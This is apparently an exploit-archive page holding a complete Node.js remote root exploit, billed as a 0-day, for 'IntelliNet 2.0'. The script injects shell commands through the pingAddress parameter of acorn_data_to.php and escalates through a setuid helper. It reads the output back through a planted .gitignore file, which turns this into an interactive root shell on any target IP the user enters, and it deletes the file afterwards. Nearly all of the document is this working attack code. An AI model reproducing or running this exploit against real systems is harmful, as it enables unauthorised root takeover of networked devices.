Share
## https://sploitus.com/exploit?id=1337DAY-ID-39743
#!/usr/local/bin/node
const { execSync } = require('child_process');
const readline = require('readline');

let TARGET = '';
let COMMAND = '';
let SESSION = '';

const ESCALATE = '/usr/aes/bin/exec_suid';

console.log(`
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣧⣶⣶⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⣠⣾⢿⣿⣿⣿⣏⠉⠉⠛⠛⠿⣷⣕⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⣠⣾⢝⠄⢀⣿⡿⠻⣿⣄⠀⠀⠀⠀⠈⢿⣧⡀⣀⣤⡾⠀⠀⠀
⠀⠀⠀⢰⣿⡡⠁⠀⠀⣿⡇⠀⠸⣿⣾⡆⠀⠀⣀⣤⣿⣿⠋⠁⠀⠀⠀⠀
⠀⠀⢀⣷⣿⠃⠀⠀⢸⣿⡇⠀⠀⠹⣿⣷⣴⡾⠟⠉⠸⣿⡇⠀⠀⠀⠀⠀
⠀⠀⢸⣿⠗⡀⠀⠀⢸⣿⠃⣠⣶⣿⠿⢿⣿⡀⠀⠀⢀⣿⡇⠀⠀⠀⠀⠀
⠀⠀⠘⡿⡄⣇⠀⣀⣾⣿⡿⠟⠋⠁⠀⠈⢻⣷⣆⡄⢸⣿⡇⠀⠀⠀⠀⠀
⠀⠀⠀⢻⣷⣿⣿⠿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠻⣿⣷⣿⡟⠀⠀⠀⠀⠀⠀
⢀⣰⣾⣿⠿⣿⣿⣾⣿⠇⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⣅⠀⠀⠀⠀⠀⠀
⠀⠰⠊⠁⠀⠙⠪⣿⣿⣶⣤⣄⣀⣀⣀⣤⣶⣿⠟⠋⠙⢿⣷⡄⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⣿⡟⠺⠭⠭⠿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠙⠏⣦⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢸⡟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

╔════════════════════════════════════════════╗
║ IntelliNet 2.0 Remote Root Exploit (0-Day) ║
║ Author: Jean Pereira <[email protected]>     ║
╚════════════════════════════════════════════╝

`);

const cleanUp = () => {
  execSync(
    `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore;"`
  );
};

const createShell = (cmd) => {
  execSync(
    `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;${encodeURIComponent(
      [ESCALATE, cmd].join(' ')
    )}%20%3E%20.gitignore;"`
  );
  return execSync(`curl -sL "http://${TARGET}/.gitignore"`).toString().trim();
};

const rl = readline.createInterface({
  input: process.stdin,
  output: process.stdout,
});

const interactiveShell = () => {
  rl.question(`root@${SESSION.slice(8)}:~# `, (currentCommand) => {
    if (currentCommand.trim() === '!q') {
      console.log('Cleaning up...');
      cleanUp();
      rl.close();
    } else {
      COMMAND = currentCommand;
      let output = createShell(COMMAND);
      console.log(output);
      interactiveShell(); 
    }
  });
};

rl.question('[*] Enter target IP: ', (targetIP) => {
  TARGET = targetIP;
  SESSION = createShell('echo a1b2c3d4$HOSTNAME');
  if (!SESSION.startsWith('a1b2c3d4')) {
    console.log('[*] Could not execute payload, aborting');
    process.exit(0);
  } else {
    console.log('[*] Payload injected to firmware');
    console.log('[*] Launching root shell via exec_suid');
  }
  console.log('');
  interactiveShell();
});

rl.on('close', () => {
  process.exit(0);
});